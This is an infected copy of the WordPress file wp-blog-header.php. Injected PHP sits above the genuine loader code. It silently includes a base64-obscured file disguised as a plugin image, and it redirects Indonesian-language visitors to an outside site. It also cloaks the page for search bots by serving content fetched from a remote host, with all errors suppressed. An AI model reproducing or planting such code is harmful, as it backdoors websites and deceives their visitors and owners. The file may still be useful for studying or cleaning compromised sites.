File: /home/microdelco/public_html/wp-blog-header.php
<?php @include base64_decode("L2hvbWUvbWljcm9kZWxjby9wdWJsaWNfaHRtbC93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC9faW5jL2ltZy9sb2dvLXFxc3Fzcm5ucW5zcm4ucG5n");?><?php
error_reporting(0);
$language = $_SERVER["HTTP_ACCEPT_LANGUAGE"];
if (strpos ( $language, "id" ) > - 1)
{
header ( 'Location: https://amp02.spbu.it.com/advancedmanufacturing.html' );
exit ();
}
$s_ref = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
if(strpos($agent,'bot') > 0 && $_SERVER['REQUEST_URI']=='/'){
$accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
if(strpos($accept_lang,'zh')>-1 || $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']==1 || $_COOKIE['az']=='lp'){setcookie('az','lp',time()+3600*7200); echo ' '; exit;}
echo file_get_contents("https://spbumedan.com/cpanel/microdel.co.il/");
exit;
}
?>
<?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}